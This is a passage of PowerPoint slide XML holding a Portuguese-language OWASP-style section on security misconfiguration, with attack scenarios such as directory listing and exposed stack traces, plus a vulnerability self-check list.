              <a:t>Cenário #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A listagem de diretórios não está </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>desativada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>em seu servidor. O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>atacante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>descobre que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>simplesmente listar os diretórios para encontrar qualquer arquivo. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Atacante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>encontra e transfere todas as suas classes Java compiladas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>decompilar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>e fazer engenharia reversa para obter todo o seu código customizado. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Assim, ele encontra uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>falha grave de acesso de controle em sua aplicação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuração do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>servidor de aplicação permite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>que os rastreamentos de pilha sejam devolvidos aos usuários, potencialmente expondo falhas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>potenciais. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Atacantes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>adoram </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>as mensagens de erro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>que fornecem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>informações extras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>servidor de aplicação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>vem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>exemplos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>que não são removidos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>seu servidor de produção. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Aplicações de exemplo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>têm falhas de segurança conhecidas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>que os </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>atacantes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>podem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>usar para comprometer o seu servidor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3657600"/>
            <a:ext cx="3383280" cy="27432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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estou vulnerável?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Está faltando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>adequada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>proteção </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>da segurança em qualquer parte da pilha de aplicação? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Incluindo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Algum software está desatualizado? Isto inclui o SO, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>servidor web/aplicação, SGBD, aplicações, e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>todas as bibliotecas de código (ver novo A9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Existem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>recursos desnecessários </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ativados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>instalados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(por exemplo, portas, serviços, páginas, contas, privilégios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Contas padrão e suas senhas ainda estão habilitadas e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>não foram alteradas?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Será que o tratamento de erros revelam rastreamentos de pilha ou outras mensagens de erro excessivamente informativas para os usuários</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>As configurações de segurança em </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>seus frameworks de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>desenvolvimento (por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>exemplo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Struts, Spring, ASP.NET) e bibliotecas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>estão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>definidas para proteger os valores</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sem um processo recorrente de configuração de segurança, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>seus sistemas estão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>expostos a um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>risco mais elevado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6477000"/>
